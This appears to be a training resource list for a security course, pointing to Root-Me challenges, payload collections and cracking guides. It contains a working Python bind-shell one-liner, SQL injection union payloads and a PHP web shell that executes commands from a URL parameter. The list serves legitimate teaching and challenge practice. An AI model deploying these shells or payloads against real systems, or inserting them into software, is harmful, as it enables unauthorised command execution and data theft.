This file list interesting link related to computer security (tools, info, tuto, interesting sites, ressources)
- https://www.root-me.org/
- https://www.hackthebox.eu/
- Podcast le comptoirsecu
- PayloadsAllTheThings
- Collection of BURP payloads
Windows Privilege Escalation CheatCheet
Linux Privilege Escalation Binary
Ngrok : Exspose ports to Internet
Aperi'Solve performs layer analysis on image
CyberChef : Encode and decode data
Download KALI linux live 2020.4
- Identify the type of hash
- Use john the ripper (already installed on kali)
- https://fr.wikipedia.org/wiki/John_the_Ripper
- https://myhackingworld.com/crack-passwords-with-john-the-ripper/
- Use a custom wordlist on john the ripper
Reverse shell Aide : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Bind Shell Aide : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet.md
Exemple de bind Shell :
python3 -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
https://portswigger.net/web-security/sql-injection/cheat-sheet
user"; --
user" union select 1,2,3,4,@@version; --
user" union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata; --
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
//Pour aller plus loin : https://github.com/flozz/p0wny-shell
?>
- Slide 15 :
Scanner le site scanme.nmap.org
- Slide 24
https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Headers
https://www.root-me.org/fr/Challenges/Web-Serveur/User-agent
https://www.root-me.org/fr/Challenges/Web-Serveur/Fichier-de-sauvegarde
- Slide 52
https://www.root-me.org/fr/Challenges/Web-Serveur/Directory-traversal
https://www.root-me.org/fr/Challenges/Web-Serveur/File-upload-double-extensions
- Slide 57
https://www.root-me.org/fr/Challenges/Web-Serveur/SQL-injection-authentification
427261766f2074752061207265757369206c65206368616c6c656e6765
aidhaSBwZXJkdQ==
26237834373b26237834373b26237832303b26237832313b26237832303b26237837343b26237837353b26237832303b26237836313b26237832303b26237837323b26237836353b26237837353b26237837333b26237837333b26237836393b
WEP - https://ufile.io/h28b15y2 WPA2 - https://ufile.io/3qfmvxzn